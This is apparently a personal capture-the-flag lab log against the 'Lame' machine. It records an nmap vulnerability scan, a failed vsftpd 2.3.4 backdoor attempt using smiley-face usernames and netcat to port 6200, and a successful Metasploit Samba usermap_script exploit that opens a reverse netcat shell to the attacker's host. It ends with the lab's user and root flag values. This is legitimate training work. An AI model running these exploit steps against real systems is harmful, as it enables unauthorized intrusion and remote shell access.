TODO:

Lame: Review
Legacy: Review



LAME: 


hippoeug@kali:~$ nmap --script vuln 10.129.137.142 -Pn -v
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-28 06:27 +08
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:27
Completed NSE at 06:27, 10.00s elapsed
Initiating NSE at 06:27
Completed NSE at 06:27, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 06:27
Completed Parallel DNS resolution of 1 host. at 06:27, 0.00s elapsed
Initiating Connect Scan at 06:27
Scanning 10.129.137.142 [1000 ports]
Discovered open port 445/tcp on 10.129.137.142
Discovered open port 139/tcp on 10.129.137.142
Discovered open port 22/tcp on 10.129.137.142
Discovered open port 21/tcp on 10.129.137.142
Completed Connect Scan at 06:27, 17.04s elapsed (1000 total ports)
NSE: Script scanning 10.129.137.142.
Initiating NSE at 06:27
NSE: [tls-ticketbleed] Not running due to lack of privileges.
NSE: [firewall-bypass] lacks privileges.
Completed NSE at 06:30, 169.30s elapsed
Initiating NSE at 06:30
Completed NSE at 06:30, 0.00s elapsed
Nmap scan report for 10.129.137.142
Host is up (0.31s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
|_sslv2-drown: 
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

NSE: Script Post-scanning.
Initiating NSE at 06:30
Completed NSE at 06:30, 0.00s elapsed
Initiating NSE at 06:30
Completed NSE at 06:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 196.76 seconds
hippoeug@kali:~$ msfconsole
                                                  

                 _---------.                                                                                                                                          
             .' #######   ;."                                                                                                                                         
  .---,.    ;@             @@`;   .---,..                                                                                                                             
." @@@@@'.,'@@            @@@@@',.'@@@@ ".                                                                                                                            
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;                                                                                                                            
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'                                                                                                                            
     "--'.@@@  -.@        @ ,'-   .'--"                                                                                                                               
          ".@' ; @       @ `.  ;'                                                                                                                                     
            |@@@@ @@@     @    .                                                                                                                                      
             ' @@@ @@   @@    ,                                                                                                                                       
              `.@@@@    @@   .                                                                                                                                        
                ',@@     @   ;           _____________                                                                                                                
                 (   3 C    )     /|___ / Metasploit! \                                                                                                               
                 ;@'. __*__,."    \|--- \_____________/                                                                                                               
                  '(.,...."/                                                                                                                                          


       =[ metasploit v6.0.29-dev                          ]
+ -- --=[ 2098 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use help <command> to learn more 
about any command

msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show options

Module options (auxiliary/scanner/ftp/anonymous):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/ftp/anonymous) > set rhost 10.129.137.142
rhost => 10.129.137.142
msf6 auxiliary(scanner/ftp/anonymous) > run

[+] 10.129.137.142:21     - 10.129.137.142:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 10.129.137.142:21     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/anonymous) > exit
hippoeug@kali:~$ nc 10.129.137.142 21
220 (vsFTPd 2.3.4)
^C
hippoeug@kali:~$ msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __                                                                                                           
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \                                                                                                          
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|                                                                                                         
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_                                                                                                         
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\                                                                                                        
                                                                                                                                                                      

       =[ metasploit v6.0.29-dev                          ]
+ -- --=[ 2098 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the 
log command, learn more with help log

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.129.137.142
rhosts => 10.129.137.142
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.129.137.142:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.137.142:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > Interrupt: use the 'exit' command to quit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
[3]+  Stopped                 msfconsole
hippoeug@kali:~$ ftp 10.10.10.3
ftp: connect: Connection timed out
ftp> ^C
ftp> ^Z
[4]+  Stopped                 ftp 10.10.10.3
hippoeug@kali:~$ ftp 10.129.137.142
Connected to 10.129.137.142.
220 (vsFTPd 2.3.4)
Name (10.129.137.142:hippoeug): 123456:)
331 Please specify the password.
Password:
500 OOPS: priv_sock_get_result
Login failed.
421 Service not available, remote server has closed connection
ftp> ^C
ftp> ^Z
[5]+  Stopped                 ftp 10.129.137.142
hippoeug@kali:~$ ftp 10.129.137.142
Connected to 10.129.137.142.
220 (vsFTPd 2.3.4)
Name (10.129.137.142:hippoeug): user:)
331 Please specify the password.
Password:
421 Service not available, remote server has closed connection
Login failed.
No control connection for command: Success
ftp> nc -vn 10.129.137.142 6200
?Invalid command
ftp> 

hippoeug@kali:~$ nc -vn 10.129.137.142 6200
(UNKNOWN) [10.129.137.142] 6200 (?) : Connection timed out
hippoeug@kali:~$ 

hippoeug@kali:~$ msfconsole
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.0.29-dev                          ]
+ -- --=[ 2098 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your 
module, why not try the reload command

msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------                                                                                                                     
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.129  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/samba/usermap_script) > set rhosts 10.129.137.142
rhosts => 10.129.137.142
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.6
lhost => 10.10.14.6
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Command shell session 1 opened (10.10.14.6:4444 -> 10.129.137.142:53572) at 2021-04-28 06:40:00 +0800



whoamo
/bin/sh: line 3: whoamo: command not found
pwd
/home/makis
ls
user.txt
cat user.txt
6e66e5335b097cba8de6320509cd6c9e
pwd
/root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
01208cdc186f839cce0ddca1bb8920d6

